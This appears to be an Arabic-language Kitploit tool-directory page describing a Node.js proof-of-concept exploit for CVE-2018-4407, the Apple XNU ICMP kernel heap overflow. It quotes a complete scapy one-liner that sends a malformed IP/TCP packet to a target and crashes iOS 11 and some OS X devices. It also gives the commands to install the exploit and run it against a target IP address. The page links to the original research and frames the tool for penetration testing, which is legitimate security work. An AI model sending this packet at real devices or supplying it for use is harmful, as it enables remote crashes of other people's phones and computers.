Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
node-cve-2018-4407 — كود استغلال PoC بلغة Node.js لثغرة CVE-2018-4407 | Kitploit
أدوات/GitHubGitHub/samdecrock/node-cve-2018-4407
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubsamdecrock/node-cve-2018-4407

node-cve-2018-4407

كود استغلال PoC بلغة Node.js لثغرة CVE-2018-4407

عرض المستودع
1072منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

node-cve-2018-4407

كود استغلال Node.js PoC لـ CVE-2018-4407

المؤلف: Sam Decrock

يعتمد هذا السكربت على سكربت scapy الذي قدمه Zuk:

iOS 12 / OS X *ثغرة تجاوز سعة الكومة في النواة عن بُعد (CVE-2018-4407) POC* في تغريدة:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))

— Zuk (@ihackbanme) 1 نوفمبر 2018

يتسبب في تعطل الأجهزة التي تعمل بنظام iOS 11 أو إصدارات أقدم بالإضافة إلى بعض إصدارات OS X.

تثبيت الوحدات

لتثبيت الوحدات المطلوبة، شغّل:

root@kitploit:~
npm install

التشغيل

للتشغيل، مرر عنوان IP الخاص بالهدف كوسيط:

root@kitploit:~
node attack.js 192.168.1.20

مزيد من المعلومات

المقال الأصلي بقلم Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407

تنزيل الأداة